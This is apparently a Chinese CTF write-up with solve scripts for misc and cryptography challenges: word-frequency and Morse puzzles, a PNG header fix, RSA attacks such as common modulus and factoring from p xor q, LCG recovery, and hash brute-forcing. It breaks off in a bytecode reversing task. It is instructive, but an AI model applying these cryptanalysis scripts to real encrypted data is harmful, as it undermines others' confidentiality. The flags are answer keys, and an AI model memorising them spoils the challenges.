g{4aHSa{kkekH{yygmygl{gf1aleglfm{ygHSHHykSH{Hl{y{{Sa{k{gg1ayfayg{gSg{ffg1llHsa{Hls1Slfg{m{fHHf{mm{l1llk{fffeyH4falla#s1{lyggaykeffS{lkgls{gkeak{l1gS{kH4f{lglgkSagS1yfem11{ml1fsklyllSlgfseag{glkSSfl1ylffalmgfsfaHly4k{saSSkkSH{malf{{g{gSm1lafyy{lsall}aHg1aafaS1klSaHHa{llfSesaySgafgeySllaH1s{gygHHSfy{HSa{l{ffka1alkfagsge{lfgflgk{Slfl{ya{gff1aHmfSgHSsf1SalS5656alfyyllfa{yk{s{{lfaSay{{gaH{HS{aSly1slyHfgaHm{S{ggffmSHakafaSHmSHS{alkggfkHHgy{eS1g{HklfHgH{a41a{gsflgfaygSsfaglygl1ffHlysllsSsf{HlHaaSl{kgflkH{sgykyHfsyHly{klHgSfSal4f1lya4lkala{f（SH{laf1kffyylfflgffg}Sa1HsllSSS1aHgglHl{alHffg1eylsffsysllkSfllgylS{fHSSmlagHflSH1Hmalsg{af{SlySleyfHfasH}SeyalslkagySHaffaffmfggaam1kal{Sff{{alg{s{lsgHmaHSmllgHfaHSl11sHlgygskgHmkaaa1fllfggf{ggygffygfyfkgS1sgS{gfflHa1lagSe{fffga1sS{{H{gSsfHSg}Ha{Slf#$%1asa1gyfllS{yflyg1sSSmkfyykfggaHfHHkSfa{fSleskmagslgeflllayff{ySslySl}kf{agsgkkmHklHSs{k}glllmys1fSll1fSgyy{{sa{mga{gaka1lH1malfklSHaaklfklf1fglakalyaHas1ff4HfffSayg{{gH1kse{gage{skHaSHy1fekHgayk1gkgmS{g{1glgSfy{mg{asg{fkafalfygf{l1SHSl1ka{{ayHkS1g{ay1glSaSHa{Hsff1lfS4H{{ae1lHSlllSmafHSH{kak{ggy1H{fagSH4a1HfSgl{a}a{Sf{lHHf{kayl1l{flSfglfelySggfal{a}{aa{S1gf1SaHfaf{SmaSgHl{falHyggHg{ggglff{klfkSfyllSgk}gfafayHHygaflkS{als{SflkSls1fSgygygf4fHHge}flyggafS{fmafl{fyykHafSHH{14af1ysaH{lkfk{kSS1{fafH{1mHall{sflffa1fl1llf1SkyfafeHa{gfkSlggfsgmSlH{gSllHaSHa1{faSyllyysa{1sfla{1SmfSgy1lslayfaya1agHl4a{fSmmaklHkafkfHfgyHSS{{ay{ylaH1ylHH{gsyHHflfSyg2^%efSlfygg{Sfa{{kSfy{fHlaag{lllagl{aSfkHkgaSfafSfSafl1yss1ymHSSseafk{{a{f{Sa{Hsffffyam4HmmkSakfagyHkglgSefsagmHSaa{lSlykH{lSlHagysgak{llfys{4{Sl4gyamfa{yllf{SSgf{{4g{{alfkg{yklaSgyklyHglsalgfaS4aH4llk{Sl{gkyH{kgsSg{kgkma}kya{sgf{Hfll1ay@gk4sSgeHg{4fHlsskaSaaffffHHSgakSmS1lsa{gsSf{gfylH{l1{gHSaga{lgkkHHH{mfkgHaf1{SlSkHffggsH{HlHmSyfylHSg1SlgggafSHSalfgfae1S1amHfele{lyf11SgSsS{fSs1g{S1yyfSylS{sgSlg{lflSSeaSSgsHSegllygylaflag{}fglgHlSaH{SsaalyHfgkalfyfHmly1fsyyySS4SasagflaS{{yfayl4HHlksl{lHkfSlfyaaff}HkffgSyHl{a1{gSglsafSmfegsgsHfkafSg{falmgf}{llHHkHkHyslagHyfg{f{{lSe{gaSmfH1y{{g{}as1{{af{flH{gaglSSaSaSffg1afgallggyaa{{yalS4ykSySk1gky{gs{g{ll1lSlyafykgg1fs{4{1fslfS{slkSy4mskHkflyf{lk4f1aS2359afall1kk{eg1fyH{l1agylyf{HkSyg{mall{l1g1f1laayfHslalykkylslma{4s{HagSka1Hsal1kHkSSfSy1{Skyags{kHmfglglf{lg{fa1fgSmllmffksgafgl1aa{lmmay{ySglHfH4l4Hf{{{gllylgSafHgfHllSefgaSlf{fgf{lgSS@syl{gkSmkaykllHSy1ffkSS1aSfeggSgsyflHaHHlkklHaslf{}Ss{laaHalHSHyskSgkySl{{Sgsaf1Hlfaykg{Hkll{sasl1ffe{{kkkfgy1ffHflsglfgSfHffy11y{fffly1yklk{fHHmagalfygHaglfSfSSakfflaHffl{ffglfaHg{skaal{fHfSSfy1Hfffmy{llllffma{eaS{s{lgHHlSaef1glSfgH4esaSyHy{aSfagHlkll1fkfHf{m1SsSk}ygfylgS11{flkflkaksflafk{llsfafsfay{1lfgygHSgfH4gSfS{mySHasf1aSkffsykkS1lfHagffa{fHlyaHe{SSfS{}S{gyykefkl{{afl1ffykSkyH{klSsgfSk{g1{f1klffSsa1{afaagH{s{a{1agafa1sfgmkf1gfylggSfkaSalHffHgf{gHSfgHsglmllsllyfmH{sySSgHSaa1flSfgkglms4{HffHgfgSaglafg{yakgg{algfyl{HH1feaagllgsHlfglaHkfkfglfy1{mHlmgfkSay1fHkfskmsyklsyska{{1HagHSySkHleflakkH{Sgfy{faff{Hgmk1fky1lffag{fSggySamlyfgffHgll{lfkSfHafyfal@@@ffllkmylf{yklH{aya{14yla{SlllyaHaaa{e1gamamaSskmkaafyalgffle{aHym{s1lf{l1aaSe{lgHf{klkHH{{{HlfyHaHaa1Sa{SSggHl1{magf11kH1kHsyg{{g1{afySmy111klykagHSksgflesggggleg{aalSm{asgfg1{ylHfa{alSllg{HkggksHlfml{a1HafamflHaa1alfygHSgS1l1fHaa1maSa{lfalalkSyaa{f

词频分析得到flag{SHyk1sme4}563@2789#%（$^

也许需要一点py

摩斯解码得到压缩包密码this1sy0ukey

打开得到

1 2	is it the true flag？ flag{pNg_and_Md5_SO_GreaT}

另外一个flag文件拖到010，发现前8位被改为了00000000，但是后面紧接着0D0A

可能是PNG，把00000000改为89504E47

打开得到

根据题目：这flag没大没小的，猜想flag的字母得互换大小写，于是写了个脚本爆破

exp:

import hashlib
import itertools

cipher = "pNg_and_Md5_SO_GreaT"
hash = "63e62fbce22f2757f99eb7da179551d2"


for i in itertools.product(['0','1'],repeat=20):
    c = ''.join(i)
    m = ""
    for a,b in zip(c,cipher):
        if b == '_':
            m += '_'
        else:
            if a == '0':
                m += b.lower()
            if a == '1':
                m += b.upper()
    hash_m = hashlib.md5(m.encode()).hexdigest()
    if hash_m == hash:
        print("flag{" + m + "}")
        break 
#flag{Png_AnD_md5_so_GReAt}

Steganography

第一张图片用010打开，发现末尾有一串base64密文，解码得到：12ercs.....909jk

第二长图片属性备注里有xqwed，拼接得到密码12ercsxqwed909jk

打开即是flag

真的签到

扫码关注公众号，发信息

Week2

Crypto

e?

p= 70724362259337647663584082414795381346569735601816096923682814277857463878289
q= 114427188167532721707398034034072867253267857672869034942206947096293901917007
e= 1314
c= 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304

$e$和$\phi(n)$不互素

exp:

import gmpy2
p= 70724362259337647663584082414795381346569735601816096923682814277857463878289
q= 114427188167532721707398034034072867253267857672869034942206947096293901917007
e= 1314
c= 4308122681135507736058122041934864039713319497673888928736468819190185301630702240416683093700232966794026900978699666246019059398861283337865339404916304
n = p * q
phi = (p-1)*(q-1)
t = gmpy2.gcd(e,phi)
d = gmpy2.invert(e // t,phi)
M = pow(c,d,n)
m = gmpy2.iroot(M,t)[0]
print(bytes.fromhex((hex(m)[2:])))
#flag{This_e_is_real_or_not}

ez_rsa

# from flag import flag
from Crypto.Util.number import getPrime
from math import prod
import libnum

with open("flag.txt","rb") as f:
    flag = f.read().strip()

m = int.from_bytes(flag[:19],"big")
m1 = int.from_bytes(flag[19:],"big")

e = 65537

primes = [getPrime(64) for i in range(32)]
n = prod(primes)
c = pow(m1,e,n)
print("c =",c)
print("n =",n)

p = libnum.generate_prime(1024)
q = libnum.generate_prime(1024)
e1 = 13
e2 = 15
n1 = p * q
c1 = pow(m1, e1, n1)
c2 = pow(m1, e2, n1)
print("n1 =", n1)
print("e1 =", e1)
print("c1 =", c1)
print("n2 =", n1)
print("e2 =", e2)
print("c2 =", c2)

# c = 28535916699190273475273097091422420145718978597126134891571109006456944397344856577421369324831702083810238921719657496747722337086131545474384253288151783029981352196506749672783866527948391034258269669654392993063423671431837882584570973320095601407578443348352802850496429240170710269529489900871208384711844617081275862971410246759090936379744946527813691945129059991795202769186014306943707223831130752782380563227353615164053563120572722464543812139164048342504963081408349934180883607554389607335607410546630525512019818062185681153477671373000186961748278118124044645584490544698827467815360888525822167
# n = 114107341297408283801468814470303963122122556489590451040619457052827864984505912502462030175984161431709841571908269123131659496812467145870607611968843929870716066046232009282431653653484798819370087696248364531531706249180822839879862098012984590503284615395588919199545142177727328844260380842155437987767067800740569616584597507776426572206990858918111272636507821551592564540694671795374831548677720629329358177802890287837056940407030212276399942462042866947423728888561392653713356355778914658317507319575084393752755452971007289968044006561357799908892371839922838486713582082980752194204224263283004373
# n1 = 21235204662158833223664424963408105101885570855652885953922511758363954474947609854216589644512813634294435585894296340005122907229365513346971631594453999584706013889403572150499529308966742992668850443386284277210686717652643585324255759216699733045642544284406720854291604837774882256435503827543483289606177965628162259184958789025311291796067574924595051311298594432767265114154138693108465671184854794167878031822162731921299518989845784744659944947091213703810190708463199067553747177712259911724424547999547534441790125049383068377243727588278432796727885216967953646999183906479537750330738956233695342750567
# e1 = 13
# c1 = 5640630966585093229374938575158853304507369792931959909038819773057666482368490365383634362421839045569190487785222799103423460816096797210546343809620912249021763787314569982909943181390882015170344954037813745251119237402775124991005154299085147091159741067430623420349690886728161235034687649593258746455165172528681627568611599473627285223154284756417744280966157271904828156564067870877521824545300153084830020169048653830385763172792698591998191641849931039720453035065355411394516308865955772746815765864888631258825704788352584540380169938419618543124830541663995097651872542381
# n2 = 21235204662158833223664424963408105101885570855652885953922511758363954474947609854216589644512813634294435585894296340005122907229365513346971631594453999584706013889403572150499529308966742992668850443386284277210686717652643585324255759216699733045642544284406720854291604837774882256435503827543483289606177965628162259184958789025311291796067574924595051311298594432767265114154138693108465671184854794167878031822162731921299518989845784744659944947091213703810190708463199067553747177712259911724424547999547534441790125049383068377243727588278432796727885216967953646999183906479537750330738956233695342750567
# e2 = 15
# c2 = 5481001445755770090420425478456880914921441486935672376394423326451811448703288166341447356603281843336826624725965666634194700496514262129376916108926167953996689011980280761368893884042609095616407660087448963015169181749124738976578495911295096014725354350167650232970262765851074146687931181216305972147994236689422572940877763047930111954798962097847426932730342258169023809341164876019161104439561164839132092594444017039073155506935768658830659965630065643619399324102814118128802834719820426253836317043818687888302054465994498115387703382090351794495827905499417861507007863378916334790750453883661675063377

part1

yafu分解得到32各因子求$\phi(n)$

part2

共模攻击

$c_1 \equiv m^{e_1} \mod n$，$c_2 \equiv m^{e_2} \mod n$

$\because gcd(e_1,e_2) = 1$

根据扩展欧几里得算法，存在x,y使得$e_1x + e_2y = gcd(e_1,e_2) = 1$

$\therefore c_1^x \times c_2^{y} \equiv m^{e_1x + e_2y} \equiv m \mod n$

exp:

import gmpy2

n1 = 114107341297408283801468814470303963122122556489590451040619457052827864984505912502462030175984161431709841571908269123131659496812467145870607611968843929870716066046232009282431653653484798819370087696248364531531706249180822839879862098012984590503284615395588919199545142177727328844260380842155437987767067800740569616584597507776426572206990858918111272636507821551592564540694671795374831548677720629329358177802890287837056940407030212276399942462042866947423728888561392653713356355778914658317507319575084393752755452971007289968044006561357799908892371839922838486713582082980752194204224263283004373
c = 28535916699190273475273097091422420145718978597126134891571109006456944397344856577421369324831702083810238921719657496747722337086131545474384253288151783029981352196506749672783866527948391034258269669654392993063423671431837882584570973320095601407578443348352802850496429240170710269529489900871208384711844617081275862971410246759090936379744946527813691945129059991795202769186014306943707223831130752782380563227353615164053563120572722464543812139164048342504963081408349934180883607554389607335607410546630525512019818062185681153477671373000186961748278118124044645584490544698827467815360888525822167
primes = [10436802938040427139,12712357180113548549,11502613740816749197,10270880245559150279,13498192768855092449,17075632607344331131,10100522426677320149,10635881647150245973,15622487550947237203,11777892065426651999,10040612110882504553,13428970346605599557,9261040693807289549,16651625235320957803,10126802520926958821,14198042938738648387,16946507762934111301,9723861249937499279,15774106340553595249,16340211116882594287,13618885037077024279,9356350172425710359,11718181938374860349,16880270107514803247,9281508366366115669,15616762946597906161,10986943768724409089,17088379813205887661,11964584391817142269,14147604789494386003,10621161426185076191,10203735303764112277]
phi = 1
for i in primes:
    phi *= i-1 

d = gmpy2.invert(65537,phi)
m = pow(c,d,n1)
flag1 = bytes.fromhex(hex(m)[2:])

n2 = 21235204662158833223664424963408105101885570855652885953922511758363954474947609854216589644512813634294435585894296340005122907229365513346971631594453999584706013889403572150499529308966742992668850443386284277210686717652643585324255759216699733045642544284406720854291604837774882256435503827543483289606177965628162259184958789025311291796067574924595051311298594432767265114154138693108465671184854794167878031822162731921299518989845784744659944947091213703810190708463199067553747177712259911724424547999547534441790125049383068377243727588278432796727885216967953646999183906479537750330738956233695342750567
e1 = 13
c1 = 5640630966585093229374938575158853304507369792931959909038819773057666482368490365383634362421839045569190487785222799103423460816096797210546343809620912249021763787314569982909943181390882015170344954037813745251119237402775124991005154299085147091159741067430623420349690886728161235034687649593258746455165172528681627568611599473627285223154284756417744280966157271904828156564067870877521824545300153084830020169048653830385763172792698591998191641849931039720453035065355411394516308865955772746815765864888631258825704788352584540380169938419618543124830541663995097651872542381
e2 = 15
c2 = 5481001445755770090420425478456880914921441486935672376394423326451811448703288166341447356603281843336826624725965666634194700496514262129376916108926167953996689011980280761368893884042609095616407660087448963015169181749124738976578495911295096014725354350167650232970262765851074146687931181216305972147994236689422572940877763047930111954798962097847426932730342258169023809341164876019161104439561164839132092594444017039073155506935768658830659965630065643619399324102814118128802834719820426253836317043818687888302054465994498115387703382090351794495827905499417861507007863378916334790750453883661675063377
s,x,y = gmpy2.gcdext(e1,e2)
m = (pow(c1,x,n2)*pow(c2,y,n2))%n2
flag2 = bytes.fromhex((hex(m)[2:]))
flag = flag1 + flag2
print(flag)
#flag{05929ec9778ed739d94ee1a77b742714}

factorizing_n

1
2
3

n = 226515252384227990547287743140613580056836242860947832749754689048997071950972581790210817523352001702907675581567498443649554801433663166425134375454937126656357069687274036935331269594383360450823787099121079436459236734336130768046337169817940540921822023269188752420603975467384377614321048859304185067329741055517464271746238143742661897809442359331215501438861121047081117632626097939097519866099140569819965948998542652908170134545593659233229897003698175558888336706474178958535138595687148003367152624421106553412886263257022809480187410133186189435436294593588009551451899398811758511878324326255293307347560753524372663257044426744744426759970254203341706284024734042826158828749144322843934985927079504722440497388146240627249465363931951790326885478025237643
c = 52409805591744226507807531465616894934028463651864630447934395956954575834603756391651746535033902964658694070544877880970130028487381287088425209448038533705903737694267359561133766799228825599943891152463160326583722749586721691729062524310148743637505134465210906856660867852927837112666513674858029892207902196213784902541173835447263733760225682942461048573387925463479672527491229113710629340960375692432470493054415657845868577650170648157402682163577152288432313996310562452677399267755695644659367792066311336521698894993982901657735586844358679888210537898629281625526455444811591386493005341435516094660429968084363084301878446471676122069724608083578102382181382107225473535696274374370868301830807644939881080301668756603163431000745972823980427048672732291
e = 65537

n能分解成p的5次方

exp:

from Crypto.Util.number import *
import gmpy2

n = 226515252384227990547287743140613580056836242860947832749754689048997071950972581790210817523352001702907675581567498443649554801433663166425134375454937126656357069687274036935331269594383360450823787099121079436459236734336130768046337169817940540921822023269188752420603975467384377614321048859304185067329741055517464271746238143742661897809442359331215501438861121047081117632626097939097519866099140569819965948998542652908170134545593659233229897003698175558888336706474178958535138595687148003367152624421106553412886263257022809480187410133186189435436294593588009551451899398811758511878324326255293307347560753524372663257044426744744426759970254203341706284024734042826158828749144322843934985927079504722440497388146240627249465363931951790326885478025237643
c = 52409805591744226507807531465616894934028463651864630447934395956954575834603756391651746535033902964658694070544877880970130028487381287088425209448038533705903737694267359561133766799228825599943891152463160326583722749586721691729062524310148743637505134465210906856660867852927837112666513674858029892207902196213784902541173835447263733760225682942461048573387925463479672527491229113710629340960375692432470493054415657845868577650170648157402682163577152288432313996310562452677399267755695644659367792066311336521698894993982901657735586844358679888210537898629281625526455444811591386493005341435516094660429968084363084301878446471676122069724608083578102382181382107225473535696274374370868301830807644939881080301668756603163431000745972823980427048672732291
e = 65537

p = 11776588228599764849559519654482976956833367474471407292255776713760090338489966385328569279135095351660161277221351884258247731394014018172166064062551483
phi = p**4 * (p-1)
d = gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))
#flag{1f95f530f85b940db810fc917607ee22}

XOR

n = 20810298530643139779725379335557687960281905096107101411585220918672653323875234344540342801651123667553812866458790076971583539529404583369246005781146655852295475940942005806084842620601383912513102861245275690036363402134681262533947475193408594967684453091957401932685922178406769578067946779033282889429596341714417295489842047781388337010440309434639274398589029236213499110100040841426995862849012466514170374143655264739023758914247116354182164550612494432327931655944868705959874670536031052370968354394583880324756639698871918124498442308334232127034553164826483441746719644515097123067550594588348951855987
c = 15294238831055894095745317706739204020319929545635634316996804750424242996533741450795483290384329104330090410419090776738963732127756947425265305276394058773237118310164375814515488333015347737716139073947021972607133348357843542310589577847859875065651579863803460777883480006078771792286205582765870786584904810922437581419555823588531402681156158991972023042592179567351862630979979989132957073962160946903567157184627177910380657091234027709595863061642453096671316307805667922247180282486325569430449985678954185611299166777141304330040782500340791721548519463552822293017606441987565074653579432972931432057376
e = 65537
p⊕q = 66138689143868607947630785415331461127626263390302506173955100963855136134289233949354345883327245336547595357625259526618623795152771487180400409991587378085305813144661971099363267511657121911410275002816755637490837422852032755234403225128695875574749525003296342076268760708900752562579555935703659615570

剪枝，通过p^q的值和n求得p,q

exp:

import sys
import gmpy2
sys.setrecursionlimit(3000)

gift = 66138689143868607947630785415331461127626263390302506173955100963855136134289233949354345883327245336547595357625259526618623795152771487180400409991587378085305813144661971099363267511657121911410275002816755637490837422852032755234403225128695875574749525003296342076268760708900752562579555935703659615570
N = 20810298530643139779725379335557687960281905096107101411585220918672653323875234344540342801651123667553812866458790076971583539529404583369246005781146655852295475940942005806084842620601383912513102861245275690036363402134681262533947475193408594967684453091957401932685922178406769578067946779033282889429596341714417295489842047781388337010440309434639274398589029236213499110100040841426995862849012466514170374143655264739023758914247116354182164550612494432327931655944868705959874670536031052370968354394583880324756639698871918124498442308334232127034553164826483441746719644515097123067550594588348951855987

def findp(p,q):
    if len(p) == 1024:
        pp = int(p,2)
        if N % pp == 0:
            print("p = ",pp)
            print("q = ",N // pp)
            
    else:
        l = len(p)
        pp = int(p,2)
        qq = int(q,2)
        if (pp ^ qq) % (2 ** l) == gift %(2**l) and pp * qq %(2 ** l) == N % (2**l):
            findp('1' + p,'1' + q)
            findp('1' + p,'0' + q)
            findp('0' + p,'1' + q)
            findp('0' + p,'0' + q)
            
findp('1','1')

p =  121707024037268877853347577606022680727723421754483145354598542291389059730952536897407296725631390435306824149329251450428520017032068370905491236371588783551854860933656246846861645834009102275363106544337746297119821339365287420703692873394398852690091625453178968493127766149991473384937200789954598163517
q =  170986832479534233007906048950464510414382588164533889416767650420928742690929190093999799507883047422413122991286355305384227808800633111611572663168246588357071419165779511128259447564377245832827901688451015954867004306626552500789867499455455629032408110167560346510245108938981288797349665759162752876911
c = 15294238831055894095745317706739204020319929545635634316996804750424242996533741450795483290384329104330090410419090776738963732127756947425265305276394058773237118310164375814515488333015347737716139073947021972607133348357843542310589577847859875065651579863803460777883480006078771792286205582765870786584904810922437581419555823588531402681156158991972023042592179567351862630979979989132957073962160946903567157184627177910380657091234027709595863061642453096671316307805667922247180282486325569430449985678954185611299166777141304330040782500340791721548519463552822293017606441987565074653579432972931432057376
e = 65537
phi = (p-1)*(q-1)

d = gmpy2.invert(e,phi)
m = pow(c,d,N)
print(bytes.fromhex(hex(m)[2:]))
#flag{7428fbd7-639b-11ee-b51b-64d69af3cb76}

easymath

from Crypto.Util.number import *
from random import *
p = getPrime(128)
seed = randint(2, p - 1)

class prng:
    n = p
    a,b = [randint(2, p - 1) for _ in range(2)]
    def __init__(self,seed):
        self.state = seed
    def next(self):
        self.state = (self.state * self.a + self.b) % self.n
        return self.state

    
def main():
    gen = prng(seed)
    s = [seed]
    s.append(gen.next())
    s.append(gen.next())
    s.append(gen.next())
    s.append(gen.next())
    s.append(gen.next())
    s.append(gen.next())
    f = open("output.txt",'w')
    json.dump(s,f)
    f.close()
    flag = "flag{"+str(gen.next())+"}"
    return flag
main()

LCG，已知seed,但是不知道a,b,n

我的另外一篇博客总结了不少LCG的知识点：LCG | DexterJie’Blog

exp:

from Crypto.Util.number import *
import gmpy2

output = [288530505749272642500730917886204398531, 63547143998110685331032679758907988154, 15151206512028268617888756820805603406, 268092204209244869520724955865278855216, 261067075335188593563542448889694952077, 138067838531633886698552659065694918861, 201319433320428898153580935653793106657]
t = []
for i in range(1,len(output)):
    t.append(output[i]-output[i-1])

T = []
for i in range(1,len(t)-1):
    T.append(t[i+1]*t[i-1] - t[i]**2)

m = []
for i in range(len(T)-1):
    mm = gmpy2.gcd(T[i],T[i+1])
    if isPrime(mm):
        m.append(int(mm))
    else:
        for i in range(1,100):
            if isPrime(mm // i):
                mm = mm // i
                m.append(int(mm))
                break
print(m)

for i in m:
    if isPrime(i):
        a = gmpy2.invert(t[0],i) * t[1] % i
        b = output[1] - a*output[0] % i
        a_ = gmpy2.invert(a,i)

        seed = output[0]
        print("seed =",seed)
        for j in range(7):
            seed = (a * seed + b) % i
        flag = "flag{"+str(seed)+"}"
        print(flag)
#flag{302184756857257140159769321021979097116}

hashes

import hashlib
from secret import flag

assert flag[:5] == "flag{"
assert flag[-1:] == "}"
flag = flag[5:-1]
assert len(flag) == 43


print(hashlib.md5(flag[0:3].encode()).hexdigest())
print(hashlib.sha256(flag[3:5].encode()).hexdigest())
print(hashlib.sha512(flag[5:7].encode()).hexdigest())
print(hashlib.sha256(flag[7:9].encode()).hexdigest())
print(hashlib.sha256(flag[9:11].encode()).hexdigest())
print(hashlib.sha224(flag[11:13].encode()).hexdigest())
print(hashlib.sha224(flag[13:15].encode()).hexdigest())
print(hashlib.sha224(flag[15:17].encode()).hexdigest())
print(hashlib.sha1(flag[17:20].encode()).hexdigest())
print(hashlib.sha1(flag[20:23].encode()).hexdigest())
print(hashlib.sha512(flag[23:25].encode()).hexdigest())
print(hashlib.sha1(flag[25:28].encode()).hexdigest())
print(hashlib.sha256(flag[28:30].encode()).hexdigest())
print(hashlib.md5(flag[30:33].encode()).hexdigest())
print(hashlib.sha256(flag[33:35].encode()).hexdigest())
print(hashlib.sha1(flag[35:38].encode()).hexdigest())
print(hashlib.sha224(flag[38:40].encode()).hexdigest())
print(hashlib.md5(flag[40:43].encode()).hexdigest())


# bba78e7d3d6ea696bfef6e87a26a6c03
# 894461aba3e5e2724278cfc40fa15dc1510b0cd56430fec9fc8a90d6d8ebe5f7
# 092ca0da5f25c595eae6cc725dc12ae75889a639d205733223cb9cfaeaa702a521971e57f768079b03d53c8f092bb2c597cc3adb4a98224a144c5d62461beb52
# 122c597083bd438b7f6d72af75d025948899647711b806bdd2cd82fa69713db3
# 153812ae5fea0b73a011bf28bd7cea93644437c3fe3260b7b2d7e1e2f9f46bde
# 24296a0d1555ad424b04dd5f6268c5613dae32cde8a469ca8c9065b9
# 15d46f8eae648f5945c4605b15e0507836ee1251b74de2e95bf9394d
# 9afdf5d1027172492a32833975a69a1e501e6f824d3e5a7121ad18af
# 2b7655eb53f6f92086e58da465c6733bd8d8a1a3
# a44fce0412ae28173cf036700c3f1cc8c7a279c6
# 7356ea99a4fa12c6a3ed8ecc1e78a7bb28cdc1208962848646cf34e0d836f420cf594606cde74bec1dc2efe511dff0dd07b558bd0c7d01a526de2e9c25d47a6f
# cc5c3fe6e7356a26a134cff5633349f597c40a9d
# 757d22f85733770bae59cc857dcfc369db29031459421b808377cf06bc9881ad
# a2c7bdf97e3c761c431f8891dcc39fa9
# 0606c0e8f78de4d7a78522a5ae2f7b70e31e669e6e2a16e11c393e4443069813
# cb6c6c7cc8189868e1feaae773f947908233cdcc
# 2cb5169af85bd3122276f8b0a731ed2ea30c8bef366bfafe76b5e7db
# d1de3eac41792a7f498dae8f439bf16d

一堆hash，麻烦在写脚本

exp:

import hashlib
from itertools import product

c = ["bba78e7d3d6ea696bfef6e87a26a6c03",
"894461aba3e5e2724278cfc40fa15dc1510b0cd56430fec9fc8a90d6d8ebe5f7",
"092ca0da5f25c595eae6cc725dc12ae75889a639d205733223cb9cfaeaa702a521971e57f768079b03d53c8f092bb2c597cc3adb4a98224a144c5d62461beb52",
"122c597083bd438b7f6d72af75d025948899647711b806bdd2cd82fa69713db3",
"153812ae5fea0b73a011bf28bd7cea93644437c3fe3260b7b2d7e1e2f9f46bde",
"24296a0d1555ad424b04dd5f6268c5613dae32cde8a469ca8c9065b9",
"15d46f8eae648f5945c4605b15e0507836ee1251b74de2e95bf9394d",
"9afdf5d1027172492a32833975a69a1e501e6f824d3e5a7121ad18af",
"2b7655eb53f6f92086e58da465c6733bd8d8a1a3",
"a44fce0412ae28173cf036700c3f1cc8c7a279c6",
"7356ea99a4fa12c6a3ed8ecc1e78a7bb28cdc1208962848646cf34e0d836f420cf594606cde74bec1dc2efe511dff0dd07b558bd0c7d01a526de2e9c25d47a6f",
"cc5c3fe6e7356a26a134cff5633349f597c40a9d",
"757d22f85733770bae59cc857dcfc369db29031459421b808377cf06bc9881ad",
"a2c7bdf97e3c761c431f8891dcc39fa9",
"0606c0e8f78de4d7a78522a5ae2f7b70e31e669e6e2a16e11c393e4443069813",
"cb6c6c7cc8189868e1feaae773f947908233cdcc",
"2cb5169af85bd3122276f8b0a731ed2ea30c8bef366bfafe76b5e7db",
"d1de3eac41792a7f498dae8f439bf16d"]

flag = "flag{"
table = [chr(i) for i in range(32,128)]

for i in product(table,repeat=3):
    m = "".join(i)
    hash = hashlib.md5(m.encode()).hexdigest()
    if hash == c[0]:
        flag += m
print(flag)
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha256(m.encode()).hexdigest()
    if hash == c[1]:
        flag += m
print(flag)     
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha512(m.encode()).hexdigest()
    if hash == c[2]:
        flag += m
print(flag)    
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha256(m.encode()).hexdigest()
    if hash == c[3]:
        flag += m
print(flag)
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha256(m.encode()).hexdigest()
    if hash == c[4]:
        flag += m
print(flag)        
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha224(m.encode()).hexdigest()
    if hash == c[5]:
        flag += m
print(flag)
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha224(m.encode()).hexdigest()
    if hash == c[6]:
        flag += m
print(flag)
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha224(m.encode()).hexdigest()
    if hash == c[7]:
        flag += m
print(flag)     
for i in product(table,repeat=3):
    m = "".join(i)
    hash = hashlib.sha1(m.encode()).hexdigest()
    if hash == c[8]:
        flag += m
print(flag)        
for i in product(table,repeat=3):
    m = "".join(i)
    hash = hashlib.sha1(m.encode()).hexdigest()
    if hash == c[9]:
        flag += m
print(flag)      
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha512(m.encode()).hexdigest()
    if hash == c[10]:
        flag += m
print(flag)       
for i in product(table,repeat=3):
    m = "".join(i)
    hash = hashlib.sha1(m.encode()).hexdigest()
    if hash == c[11]:
        flag += m
print(flag)       
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha256(m.encode()).hexdigest()
    if hash == c[12]:
        flag += m
print(flag)              
for i in product(table,repeat=3):
    m = "".join(i)
    hash = hashlib.md5(m.encode()).hexdigest()
    if hash == c[13]:
        flag += m
print(flag)       
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha256(m.encode()).hexdigest()
    if hash == c[14]:
        flag += m
print(flag)
for i in product(table,repeat=3):
    m = "".join(i)
    hash = hashlib.sha1(m.encode()).hexdigest()
    if hash == c[15]:
        flag += m
print(flag)      
for i in product(table,repeat=2):
    m = "".join(i)
    hash = hashlib.sha224(m.encode()).hexdigest()
    if hash == c[16]:
        flag += m
print(flag)       
for i in product(table,repeat=3):
    m = "".join(i)
    hash = hashlib.md5(m.encode()).hexdigest()
    if hash == c[17]:
        flag += m
flag += "}"
print(flag)
#flag{YOU'vE_c0m3_To_UNDerS7anD_Ha5H_GDIbgdF3EocT}

Re

pycode

  0           0 RESUME                   0

  1           2 LOAD_CONST               0 (0)
              4 LOAD_CONST               1 (None)
              6 IMPORT_NAME              0 (base64)
              8 STORE_NAME               0 (base64)

  2          10 LOAD_CONST               2 ('*******************')
             12 STORE_NAME               1 (flag)

  3          14 LOAD_CONST               3 ('')
             16 STORE_NAME               2 (value)

  4          18 LOAD_CONST               3 ('')
             20 STORE_NAME               3 (output)

  5          22 PUSH_NULL
             24 LOAD_NAME                4 (range)
             26 LOAD_CONST               4 (1000)
             28 PRECALL                  1
             32 CALL                     1
             42 GET_ITER
        >>   44 FOR_ITER                24 (to 94)
             46 STORE_NAME               5 (i)

  6          48 LOAD_CONST               5 (1024)
             50 STORE_NAME               6 (w)

  7          52 LOAD_NAME                6 (w)
             54 LOAD_CONST               6 (3)
             56 BINARY_OP                6 (%)
             60 STORE_NAME               7 (x)

  8          62 LOAD_NAME                6 (w)
             64 LOAD_CONST               7 (9)
             66 BINARY_OP                2 (//)
             70 STORE_NAME               8 (y)

  9          72 LOAD_NAME                7 (x)
             74 LOAD_NAME                8 (y)
             76 BINARY_OP                5 (*)
             80 STORE_NAME               9 (z)

 10          82 LOAD_NAME                6 (w)
             84 LOAD_NAME                9 (z)
             86 BINARY_OP               23 (-=)
             90 STORE_NAME               6 (w)
             92 JUMP_BACKWARD           25 (to 44)

 11     >>   94 PUSH_NULL
